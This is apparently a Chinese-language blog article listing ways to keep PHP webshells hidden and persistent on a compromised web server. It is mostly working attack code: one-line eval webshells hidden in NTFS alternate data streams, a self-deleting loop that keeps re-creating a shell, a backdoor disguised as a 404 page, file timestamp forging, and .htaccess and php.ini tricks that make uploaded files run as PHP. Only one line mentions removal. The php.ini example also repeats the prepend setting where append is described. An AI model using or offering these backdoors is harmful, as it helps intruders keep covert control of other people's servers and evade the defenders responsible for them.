PHP後門隱藏的一些技巧總結
前言
如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏檔案,修改時間屬性,隱藏檔案內容等。
1、隱藏檔案
使用Attrib +s +a +h +r命令就是把原本的資料夾增加了系統檔案屬性、存檔檔案屬性、只讀檔案屬性和隱藏檔案屬性。
attrib +s +a +h +r shell.php //隱藏shell.php檔案
2、修改檔案時間屬性
當你試圖在一堆檔案中隱藏自己新建立的檔案,那麼,除了建立一個迷惑性的檔名,還需要修改檔案的修改日期。
//修改時間修改 Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //訪問時間修改 Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //建立時間修改 Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使用命令獲取檔案屬性
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某個資料夾下所有檔案的建立和修改時間
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、利用ADS隱藏檔案內容
在伺服器上echo一個數據流檔案進去,比如index.php是網頁正常檔案,我們可以這樣子搞:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
這樣子就生成了一個不可見的shell hidden.jpg,常規的檔案管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。
利用include函式,將index.php:hidden.jpg進行hex編碼,把這個ADS檔案include進去,這樣子就可以正常解析我們的一句話了。
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、不死馬
不死馬會刪除自身,以程序的形式迴圈建立隱蔽的後門。
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //刪除自身
while(1)
{
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //建立shell.php,這裡最好用免殺的一句話
sleep(10); //間隔時間
}
?>
處理方式最簡單有效的辦法,就是重啟服務就可以刪除webshell檔案。
5、中介軟體後門
將編譯好的so檔案複製到modules資料夾,啟動後門模組,重啟Apache。當傳送特定引數的字串過去時,即可觸發後門。
github專案地址:
https://github.com/VladRico/apache2_BackdoorMod
6、利用404頁面隱藏後門
404頁面主要用來提升使用者體驗,可用來隱藏後門檔案。
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
7、利用 .htaccess 檔案構成PHP後門
一般.htaccess可以用來留後門和針對黑名單繞過,在上傳目錄建立.htaccess 檔案寫入,無需重啟即可生效,上傳png檔案解析。
AddType application/x-httpd-php .png
另外,在.htaccess 加入php解析規則,把檔名包含1的解析成php,上傳1.txt即可解析。
<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>
8、利用 php.ini 隱藏後門檔案
php.ini 中可以指定在主檔案執行前後自動解析的檔名稱,常用於頁面公共頭部和尾部,也可以用來隱藏php後門。
;在PHP文件之前自動新增檔案。
auto_prepend_file = "c:\tmp.txt"
;在PHP文件之後自動新增檔案。
auto_prepend_file = "c:\tmp.txt"
需重啟服務生效,訪問任意一個php檔案即可獲取webshell。
總結
到此這篇關於PHP後門隱藏的一些技巧的文章就介紹到這了,更多相關PHP後門隱藏技巧內容請搜尋我們以前的文章或繼續瀏覽下面的相關文章希望大家以後多多支援我們!